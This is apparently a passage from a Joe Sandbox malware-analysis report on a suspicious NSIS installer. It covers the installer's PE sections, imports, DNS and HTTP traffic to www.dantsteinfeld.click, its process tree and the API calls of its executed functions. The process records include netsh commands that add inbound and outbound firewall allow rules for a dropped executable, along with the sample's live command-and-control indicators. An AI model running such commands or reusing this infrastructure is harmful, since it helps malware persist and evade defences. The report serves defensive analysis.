.ndata	0x3a9000	0x40000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3e9000	0x3ec0	0x4000	accbbdadc7780994edb470ff987ad04f	False	0.63299560546875	data	5.994142182983153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3e92b0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7213883677298312
RT_ICON	0x3ea358	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colors	English	United States	0.6751066098081023
RT_ICON	0x3eb200	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors	English	United States	0.7851985559566786
RT_ICON	0x3ebaa8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.6560693641618497
RT_ICON	0x3ec010	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8031914893617021
RT_ICON	0x3ec478	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.3118279569892473
RT_ICON	0x3ec760	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.36824324324324326
RT_DIALOG	0x3ec888	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3ec988	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3ecaa8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3ecb08	0x68	data	English	United States	0.6634615384615384
RT_MANIFEST	0x3ecb70	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5517241379310345

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 09:12:01.322154045 CET	49730	80	192.168.2.4	23.106.59.18
Dec 29, 2024 09:12:01.441945076 CET	80	49730	23.106.59.18	192.168.2.4
Dec 29, 2024 09:12:01.442071915 CET	49730	80	192.168.2.4	23.106.59.18
Dec 29, 2024 09:12:01.442931890 CET	49730	80	192.168.2.4	23.106.59.18
Dec 29, 2024 09:12:01.562490940 CET	80	49730	23.106.59.18	192.168.2.4
Dec 29, 2024 09:12:02.691049099 CET	80	49730	23.106.59.18	192.168.2.4
Dec 29, 2024 09:12:02.695777893 CET	49730	80	192.168.2.4	23.106.59.18
Dec 29, 2024 09:12:02.815665960 CET	80	49730	23.106.59.18	192.168.2.4
Dec 29, 2024 09:12:02.815720081 CET	49730	80	192.168.2.4	23.106.59.18

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 09:12:00.150595903 CET	58373	53	192.168.2.4	1.1.1.1
Dec 29, 2024 09:12:01.136327982 CET	58373	53	192.168.2.4	1.1.1.1
Dec 29, 2024 09:12:01.311990023 CET	53	58373	1.1.1.1	192.168.2.4
Dec 29, 2024 09:12:01.312009096 CET	53	58373	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 09:12:00.150595903 CET	192.168.2.4	1.1.1.1	0xd26b	Standard query (0)	www.dantsteinfeld.click	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:12:01.136327982 CET	192.168.2.4	1.1.1.1	0xd26b	Standard query (0)	www.dantsteinfeld.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 09:12:01.311990023 CET	1.1.1.1	192.168.2.4	0xd26b	No error (0)	www.dantsteinfeld.click	ppp84k45ss7ehy8ypic5x.limelightcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 09:12:01.311990023 CET	1.1.1.1	192.168.2.4	0xd26b	No error (0)	ppp84k45ss7ehy8ypic5x.limelightcdn.com		23.106.59.18	A (IP address)	IN (0x0001)	false
Dec 29, 2024 09:12:01.312009096 CET	1.1.1.1	192.168.2.4	0xd26b	No error (0)	www.dantsteinfeld.click	ppp84k45ss7ehy8ypic5x.limelightcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 09:12:01.312009096 CET	1.1.1.1	192.168.2.4	0xd26b	No error (0)	ppp84k45ss7ehy8ypic5x.limelightcdn.com		23.106.59.18	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dantsteinfeld.click

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.106.59.18	80	7424	C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 09:12:01.442931890 CET	73	OUT	GET / HTTP/1.1 Host: www.dantsteinfeld.click Connection: Keep-Alive
Dec 29, 2024 09:12:02.691049099 CET	256	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:12:01 GMT Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13 X-Powered-By: PHP/5.3.13 Content-Length: 2 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Data Raw: 6f 6b Data Ascii: ok

Target ID:	0
Start time:	03:11:57
Start date:	29/12/2024
Path:	C:\Users\user\Desktop\KYagm8gq5S.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KYagm8gq5S.exe"
Imagebase:	0x400000
File size:	2'666'282 bytes
MD5 hash:	59586C94EE121385D362A60382217B4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:11:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:11:57
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:11:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:11:57
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:11:58
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" "http://www.dantsteinfeld.click" "C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519"
Imagebase:	0xfd0000
File size:	5'632 bytes
MD5 hash:	71923BB5EDAFF27984A1A49095554A5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:11:58
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\explorer.exe
Imagebase:	0x3f0000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.6%
Total number of Nodes:	1358
Total number of Limit Nodes:	29

Executed Functions

Function 0040352F Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403552
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040357D
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403629
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403666
OleInitialize.OLE32(00000000), ref: 0040366D
SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A1
CharNextW.USER32(00000000,007B3000,00000020,007B3000,00000000,?,00000008,0000000A,0000000C), ref: 004036DA
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403812
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040382F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403843
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403864
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403878
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B3000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403951

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561

wsprintfW.USER32 ref: 004039AE
GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\), ref: 004039E1
DeleteFileW.KERNEL32(007AB800), ref: 004039ED
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1B

Part of subcall function 00406314: MoveFileExW.KERNELBASE(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E

CopyFileW.KERNEL32(C:\Users\user\Desktop\KYagm8gq5S.exe,007AB800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31

Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B60
Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B6D

Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(74DF3420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8

ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7A
CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7F
ExitProcess.KERNEL32 ref: 00403A9C
CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,007AB800,00000000), ref: 00403AA3
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403ABF
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AFE
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
ExitProcess.KERNEL32 ref: 00403B46

Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08

Strings

1033, xrefs: 00403873
C:\Users\user\Desktop\KYagm8gq5S.exe, xrefs: 00403A2C
NSIS Error, xrefs: 00403692
TMP, xrefs: 0040385F
C:\Users\user\AppData\Local\Temp\, xrefs: 00403807, 0040380C, 00403822, 0040382E, 0040383D, 0040384A, 00403856, 0040385E, 0040394C, 004039CD, 004039F9, 00403A1A, 00403A23
~nsu%X.tmp, xrefs: 004039A5
TEMP, xrefs: 00403857
UXTHEME, xrefs: 0040361D, 00403622, 00403628
Low, xrefs: 00403845
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 00403924
C:\Users\user\Desktop, xrefs: 0040396F
\Temp, xrefs: 00403829
Error launching installer, xrefs: 004038FA
SeShutdownPrivilege, xrefs: 00403AD5

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\KYagm8gq5S.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 2017177436-3456020372
Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

Function 00405C60 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405C89
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CD1
lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CF4
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CFA
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405D0A
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAA
FindClose.KERNEL32(00000000), ref: 00405DB9

Strings

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*, xrefs: 00405CB9, 00405CBF, 00405CD0, 00405D09
\*.*, xrefs: 00405CCB
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C6D

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\*.*$\*.*
API String ID: 2035342205-3164024899
Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE

Function 004068B1 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
FindClose.KERNEL32(00000000), ref: 004068C8

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8

Function 00403C26 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975

GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403C40

Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8

lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403CA7
lstrlenW.KERNEL32(Del,?,?,?,Del,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,74DF3420), ref: 00403D27
lstrcmpiW.KERNEL32(?,.exe,Del,?,?,?,Del,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
GetFileAttributesW.KERNEL32(Del), ref: 00403D45
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D8E
RegisterClassW.USER32(007A7200), ref: 00403DCB
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE3
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
ShowWindow.USER32(00000005,00000000), ref: 00403E4E
GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
RegisterClassW.USER32(007A7200), ref: 00403E90
DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF

Strings

1033, xrefs: 00403C46, 00403CA2
.DEFAULT\Control Panel\International, xrefs: 00403C92
_Nb, xrefs: 00403DAA, 00403E12
RichEd32, xrefs: 00403E62
RichEd20, xrefs: 00403E54
RichEdit, xrefs: 00403E81
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5A
RichEdit20W, xrefs: 00403E72, 00403E78
Del, xrefs: 00403CEE, 00403CF7, 00403D05, 00403D26, 00403D44, 00403D54, 00403D5A
.exe, xrefs: 00403D34
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2B

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Del$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-2615572121
Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
